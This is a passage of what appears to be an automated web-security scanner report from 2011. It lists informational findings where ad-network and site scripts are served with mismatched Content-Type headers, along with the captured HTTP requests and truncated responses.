http://www.silverpop.com/images/headers/Sitemap_L3.jpg
http://www.silverpop.com/images/home/banners/Dreamforce.jpg
http://www.silverpop.com/images/home/banners/Lead-Management.jpg
http://www.silverpop.com/images/roles/banner_B2B-Marketer.jpg
http://www.silverpop.com/images/roles/banner_Email-Marketer.jpg
http://www.silverpop.com/images/roles/banner_agencies.jpg
http://www.silverpop.com/imx/gui_background.jpg
http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

29.1. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; Charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.2. http://a1.interclick.com/getInPageJS.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a1.interclick.com
Path:	/getInPageJS.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=53&b=51114&cid=634206663009846585 HTTP/1.1
Host: a1.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=6;sz=728x90;ord=101352252258050
Cookie: T=1; uid=u=7e1f4d20-a8f4-40d3-9d87-6cf2443de920; Aqprep_Banner160X600=160022=634406941334755622:51445; sgm=7472=734338

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Fri, 22 Jul 2011 01:24:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 21 Jul 2011 19:24:37 GMT
Content-Length: 6352

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...

29.3. http://a1.interclick.com/getInPageJSProcess.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a1.interclick.com
Path:	/getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.4. http://adadvisor.net/adscores/g.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://adadvisor.net
Path:	/adscores/g.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adscores/g.js?sid=9212076087 HTTP/1.1
Host: adadvisor.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/ticolscr.aspx

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:32:56 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 38
Content-Type: application/javascript

TargusCallback("000", "", "", "", "");

29.5. http://ads.adap.tv/beacons previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.adap.tv
Path:	/beacons

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A29";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:09 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 940

jsonp1311396514352({
"beacons":["http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://adadvisor.net/adscores/g.pixel?sid=9204679687", "http://pix04.revsci.net/A11149/a4/0/0/12
...[SNIP]...

29.6. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.7. http://aka-cdn-ns.adtechus.com/apps/160/Ad1840288St3Sz154Sq20383166V2Id2/E-160x600.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://aka-cdn-ns.adtechus.com
Path:	/apps/160/Ad1840288St3Sz154Sq20383166V2Id2/E-160x600.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /apps/160/Ad1840288St3Sz154Sq20383166V2Id2/E-160x600.jpg HTTP/1.1
Host: aka-cdn-ns.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 06 Jul 2011 16:08:32 GMT
Accept-Ranges: bytes
Content-Length: 153328
Content-Type: image/jpeg
Cache-Control: max-age=248213
Expires: Tue, 26 Jul 2011 10:45:28 GMT
Date: Sat, 23 Jul 2011 13:48:35 GMT
Connection: close

......JFIF.....,.,.....VExif..MM.*.............................b...........j.(...........1.........r.2...........i.................,.......,....Adobe Photoshop CS Macintosh.2008:06:16 14:19:38........
...[SNIP]...

29.8. http://aka-cdn-ns.adtechus.com/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile1.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://aka-cdn-ns.adtechus.com
Path:	/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile1.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile1.js HTTP/1.1
Host: aka-cdn-ns.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx

Response

29.9. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.10. http://articleonepartners.app7.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://articleonepartners.app7.hubspot.com
Path:	/salog.js.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.11. http://attributiontrackingga.googlecode.com/svn/trunk/distilled.FirstTouch.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://attributiontrackingga.googlecode.com
Path:	/svn/trunk/distilled.FirstTouch.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /svn/trunk/distilled.FirstTouch.js HTTP/1.1
Host: attributiontrackingga.googlecode.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:50:25 GMT
Server: Apache
Last-Modified: Wed, 11 Aug 2010 16:01:51 GMT
ETag: "9//trunk/distilled.FirstTouch.js"
Accept-Ranges: bytes
Expires: Fri, 22 Jul 2011 19:53:25 GMT
Content-Length: 3736
Content-Type: text/plain
Age: 167
Cache-Control: public, max-age=180

// 2010-02-16 v2
// Will Critchlow, Distilled, http://www.distilled.co.uk

// 2010-02-09 v1
// 2010-02-16 v2 - added function distilledTruncate() and distilledFirstTouch()
// 2010-08-11 v3 - adde
...[SNIP]...

29.12. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bostonglobe.tt.omtrdc.net
Path:	/m2/bostonglobe/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/bostonglobe/mbox/standard?mboxHost=www.boston.com&mboxSession=1311428781592-195064&mboxPage=1311428781592-195064&screenHeight=1200&screenWidth=1920&browserWidth=948&browserHeight=845&browserTimeOffset=-300&colorDepth=32&mboxXDomain=enabled&mboxCount=1&mboxPageValue=0.74&pageType=Article%20Page&path=%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F&profile.userRegistered=false&user.categoryAffinity=Lifestyle&mbox=bc_globalMbox&mboxId=0&mboxTime=1311410781597&mboxURL=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: bostonglobe.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

29.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=1 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/
Cookie: C4=; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; ActivityInfo=000iPlceU%5f

Response

29.14. http://cache.boston.com/universal/js/sitelife/DirectProxy previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.boston.com
Path:	/universal/js/sitelife/DirectProxy

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /universal/js/sitelife/DirectProxy HTTP/1.1
Host: cache.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; RMFD=011QgHGVO1060Oe; __unam=b6206f2-130c7ed914a-12883c53-4; bcpage=6

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:38:28 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Content-Type: text/plain
Warning: 110 cache.boston.com "Response is stale" "Fri, 15 Jul 2011 18:43:15 GMT"
Last-Modified: Tue, 08 Jun 2010 14:47:30 GMT
ETag: "d6e8a-13ecb-48885de69654f"
Accept-Ranges: bytes
Served-By: garrick
Age: 456
Cache-Control: max-age=3597
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Sat, 23 Jul 2011 14:38:25 GMT
Via: 1.1 rhv082178010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 81611

/*

Collection of 5 scripts defined by http://sitelife.boston.com/ver1.0/Direct/DirectProxy

yahoo-min.js

Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD Licen
...[SNIP]...

29.15. http://cache.boston.com/universal/js/sitelife/SiteLifeProxy previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.boston.com
Path:	/universal/js/sitelife/SiteLifeProxy

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /universal/js/sitelife/SiteLifeProxy HTTP/1.1
Host: cache.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; RMFD=011QgHGVO1060Oe; __unam=b6206f2-130c7ed914a-12883c53-4; bcpage=6

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:14:03 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Content-Type: text/plain
Last-Modified: Wed, 01 Dec 2010 20:18:57 GMT
ETag: "d6e8b-16013-4965f03e14f37"
Accept-Ranges: bytes
Served-By: rebecca
Age: 1923
Cache-Control: max-age=3599
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Sat, 23 Jul 2011 14:14:01 GMT
Via: 1.1 rhv082185010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 90131

document.write("<link href='http://sitelife.boston.com/ver1.0/SiteLifeCss' rel='stylesheet' type='text/css' />");
document.write("<script type='text/javascript' src='http://sitelife.boston.co
...[SNIP]...

29.16. http://cache.boston.com/universal/js/sitelife/SiteLifeScripts previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.boston.com
Path:	/universal/js/sitelife/SiteLifeScripts

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /universal/js/sitelife/SiteLifeScripts HTTP/1.1
Host: cache.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; RMFD=011QgHGVO1060Oe; __unam=b6206f2-130c7ed914a-12883c53-4; bcpage=6

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:38:30 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Content-Type: text/plain
Last-Modified: Tue, 08 Jun 2010 14:47:38 GMT
ETag: "d6e91-1edf-48885deebb0dd"
Accept-Ranges: bytes
Served-By: garrick
Age: 456
Cache-Control: max-age=3598
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Sat, 23 Jul 2011 14:38:26 GMT
Via: 1.1 rhv082184010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 7903

var numUploads = 1;
var maxUploads = 4;

function VerifyTOS() {
if(!document.getElementById("plckTermsOfPhotoService").checked) {
alert("Please agree to the terms of service before
...[SNIP]...

29.17. http://catrg.peer39.net/443/131/66315943 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://catrg.peer39.net
Path:	/443/131/66315943

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /443/131/66315943?aid=00712&sid=00000&pu=http%3A//online.wsj.com/article/SB10001424053111904233404576462461660747244.html&cc=/7QnkE80XLKzILiqpjgeKxf/yYqPe70zfdO7mPRtaGk%3D&pt=U.S.%20Default%20Insurance%20Has%20Quirks%20-%20WSJ.com&sd=4486080 HTTP/1.1
Host: catrg.peer39.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "bfcd5e5c035c8107ce219d55c96e2390:1311374760"
Last-Modified: Fri, 22 Jul 2011 22:45:47 GMT
Accept-Ranges: bytes
Content-Length: 678
Content-Type: text/plain
Date: Sat, 23 Jul 2011 04:30:57 GMT
Connection: close
X-N: S

function getTargetingTags_712() { return '<?xml version="1.0" encoding="UTF-8"?><responseContainer><service><classifier><category path="Personal Finance" description="" name="Personal Finance" id="22
...[SNIP]...

29.18. http://consultants-locator.apple.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092; __utma=154752810.31229104.1311280886.1311280886.1311280886.1; __utmb=154752810.2.10.1311280886; __utmc=154752810; __utmz=154752810.1311280886.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:42:57 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 19 Oct 2010 22:01:51 GMT
ETag: "3f649b-1e66-492ff70a4b1c0"
Accept-Ranges: bytes
Content-Length: 7782
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...F...........h....... ........... .. ..............(....... ...........@.............................................................................................................
...[SNIP]...

29.19. http://consultants-locator.apple.com/javascript/fancybox/jquery.fancybox-1.3.4.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/fancybox/jquery.fancybox-1.3.4.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/fancybox/jquery.fancybox-1.3.4.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 29398
Connection: close
Content-Type: text/html;charset=UTF-8

/*
* FancyBox - jQuery Plugin
* Simple and fancy lightbox alternative
*
* Examples and documentation at: http://fancybox.net
*
* Copyright (c) 2008 - 2010 Janis Skarnelis
* That said, it
...[SNIP]...

29.20. http://consultants-locator.apple.com/javascript/formatDate.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/formatDate.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/formatDate.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
